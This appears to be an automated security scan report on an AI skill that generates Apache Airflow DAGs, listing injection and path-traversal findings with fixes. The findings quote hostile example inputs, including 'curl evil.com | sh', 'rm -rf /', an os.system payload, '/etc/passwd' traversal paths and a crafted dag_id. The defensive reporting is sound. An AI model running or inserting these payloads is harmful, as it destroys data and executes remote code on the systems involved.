Trust Assessment
airflow-dag received a trust score of 58/100, placing it in the Caution category. This skill has some security considerations that users should review before deployment.
SkillShield's automated analysis identified 6 findings: 2 critical, 2 high, 2 medium, and 0 low severity. Key findings include Missing required field: name, Arbitrary Bash Command Injection in Generated DAG, Arbitrary Python Code Execution in Generated DAG.
The analysis covered 4 layers: Manifest Analysis, Static Code Analysis, Dependency Graph, LLM Behavioral Safety. The LLM Behavioral Safety layer scored lowest at 3/100, indicating areas for improvement.
Last analyzed on February 13, 2026 (commit 13146e6a). SkillShield performs automated 4-layer security analysis on AI skills and MCP servers.
Layer Breakdown
Behavioral Risk Signals
Security Findings6
| Severity | Finding | Layer | Location | |
|---|---|---|---|---|
| CRITICAL | Arbitrary Bash Command Injection in Generated DAG The `add_bash_task` method allows a user to provide an arbitrary `command` string. This string is directly interpolated into the `bash_command` parameter of an Airflow `BashOperator` within the generated Python code. A malicious user could inject shell commands (e.g., `rm -rf /`, `curl evil.com | sh`) which would be executed by the Airflow worker when the DAG runs. This constitutes a severe command injection vulnerability. The `bash_command` should be sanitized or validated to prevent arbitrary command execution. If arbitrary commands are intended, the skill should explicitly warn the user about the security implications and potentially restrict the execution environment (e.g., using a container with minimal privileges). For common use cases, consider providing a more structured way to define commands or using a safer operator if available. Escaping quotes or disallowing certain characters in the input `command` string is crucial. | LLM | SKILL.md:160 | |
| CRITICAL | Arbitrary Python Code Execution in Generated DAG The `add_python_task` and `add_branch_task` methods allow a user to provide a `python_callable` string. This string is directly interpolated into the `python_callable` parameter of an Airflow `PythonOperator` or `BranchPythonOperator` within the generated Python code. A malicious user could inject arbitrary Python code (e.g., `__import__('os').system('rm -rf /')`, `lambda: exec('import os; os.environ["EVIL"] = "PWNED"')`) which would be executed by the Airflow worker when the DAG runs. This allows for arbitrary code execution. The `python_callable` string should be strictly validated to ensure it refers to a safe, pre-defined function or module path, rather than allowing arbitrary code. If dynamic Python execution is required, consider using a safer execution environment (e.g., sandboxed execution) or a whitelist of allowed callables. Direct interpolation of user-controlled code is highly dangerous. | LLM | SKILL.md:169 | |
| HIGH | Arbitrary File Path Access in Generated DAG The `add_sensor_task` method allows a user to provide an arbitrary `filepath` string. This string is directly interpolated into the `filepath` parameter of an Airflow `FileSensor` within the generated Python code. A malicious user could specify paths outside the intended data directories (e.g., `/etc/passwd`, `../../sensitive_data.txt`) to monitor the existence of sensitive files, potentially aiding in data exfiltration or reconnaissance. While `FileSensor` only checks for existence, it can be used to confirm paths or trigger other malicious tasks based on sensitive file presence. Validate the `filepath` to ensure it adheres to expected patterns (e.g., starts with `/data/input/`) and does not contain path traversal sequences (`..`, `/`). Consider using a whitelist of allowed directories or a more robust path sanitization library to restrict file access. | LLM | SKILL.md:175 | |
| HIGH | Arbitrary File Write Location via `save_dag` The `save_dag` method allows a user to specify an arbitrary `output_path` for the generated DAG file. A malicious user could specify paths outside the intended `/airflow/dags/` directory (e.g., `/etc/passwd`, `../../sensitive_config.py`) to overwrite critical system files or other application files, leading to denial of service, privilege escalation, or other system compromises. Validate the `output_path` to ensure it is within an allowed, restricted directory (e.g., `/airflow/dags/`) and does not contain path traversal sequences (`..`, `/`). Enforce a strict whitelist or pattern matching for the output path. | LLM | SKILL.md:189 | |
| MEDIUM | Missing required field: name The 'name' field is required for claude_code skills but is missing from frontmatter. Add a 'name' field to the SKILL.md frontmatter. | Static | skills/datadrivenconstruction/airflow-dag/SKILL.md:1 | |
| MEDIUM | Potential Code Injection via `dag_id` or `schedule` The `dag_id` and `schedule` parameters are directly interpolated into the generated DAG code using f-strings without explicit escaping. While these are typically simple strings, a sophisticated attacker might attempt to inject Python code or manipulate the generated DAG structure by carefully crafting these strings (e.g., `dag_id='my_dag', default_args=evil_args, schedule_interval='@daily'`). Although less direct than `bash_command` or `python_callable`, it's a potential vector for code manipulation if not properly sanitized. Ensure that `dag_id` and `schedule` strings are properly escaped or validated to prevent injection of quotes or other characters that could break out of the string literal and inject code. For `dag_id`, enforce strict naming conventions (e.g., alphanumeric, underscores only). For `schedule`, validate against known cron patterns or Airflow schedule presets. | LLM | SKILL.md:140 |
Scan History
Embed Code
[](https://skillshield.io/report/6cc090612368b015)
Powered by SkillShield